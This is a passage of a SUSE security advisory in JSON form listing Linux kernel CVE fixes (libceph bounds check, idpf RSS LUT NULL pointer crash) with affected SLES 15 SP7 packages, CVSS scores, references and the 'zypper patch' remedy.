"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
